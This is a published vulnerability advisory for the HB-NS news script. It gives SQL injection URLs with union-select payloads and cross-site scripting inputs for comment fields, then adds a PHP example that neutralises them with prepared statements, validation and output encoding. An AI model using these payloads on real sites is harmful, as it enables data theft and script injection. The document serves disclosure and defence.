PoC/Exploit for Multiple XSS and SQL Injection in HB-NS

Published Proof of Concept code - Multiple XSS and SQL Injection in HB-NS.

Description: Available
Solution: Not available - check vendor's website

1. SQL Injection Example.

URL: http://[host]/index.php?action=topic&topic=zzzz'%20union%20select%201,2,3,4,5,6/*

URL: http://[host]/index.php?action=list&id=999'%20union%20select%201,2,3,4,5/*


2. Cross-Site Scripting Example.

URL: http://[host]/index.php?action=comment&id=1#comments
Your name (required): [XSS]
Your email: ">[XSS]<"
Your homepage: javascript:alert(1)
Comments (required): [XSS]
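
The two query parameters and the comment form fields above, handled defensively in PHP (the application's language, going by index.php). This is an added example, not code from HB-NS or from the advisory; the table and column names, the helper functions and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example. Hypothetical schema: HB-NS's real tables are not shown in the advisory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, title TEXT)");
$db->exec("INSERT INTO news (topic, title) VALUES ('general', 'Hello')");

// 'topic' is a string: bind it as a parameter, never concatenate it into the SQL text.
function news_by_topic(PDO $db, string $topic): array {
    $st = $db->prepare('SELECT id, title FROM news WHERE topic = :topic');
    $st->execute([':topic' => $topic]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// 'id' is numeric: reject anything that is not a positive integer, then bind it.
function news_by_id(PDO $db, string $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) return null;
    $st = $db->prepare('SELECT id, title FROM news WHERE id = :id');
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HTML-encode for element content and quoted-attribute contexts.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The homepage value lands in an href: allow only http/https, otherwise render no link.
function safe_homepage(string $url): ?string {
    $url = trim($url);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

function render_comment(array $c): string {
    $name = h($c['name']);
    $home = safe_homepage($c['homepage']);
    $author = $home !== null ? '<a href="' . h($home) . '" rel="nofollow">' . $name . '</a>' : $name;
    return '<div class="comment" data-email="' . h($c['email']) . '">' . $author . ': ' . h($c['comment']) . '</div>';
}

// Constructed inputs mirroring the advisory's parameters and form fields.
var_dump(news_by_topic($db, "zzzz' union select 1,2,3,4,5,6/*"));
var_dump(news_by_id($db, "999' union select 1,2,3,4,5/*"));
echo render_comment(['name' => '<b>n</b>', 'email' => '"><i>', 'homepage' => 'javascript:alert(1)', 'comment' => '<u>c</u>']), "\n";
```

With bound parameters the quote in `topic` is treated as data, the non-integer `id` is rejected before any query runs, and the `javascript:` homepage is dropped while the remaining fields are rendered as encoded text.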
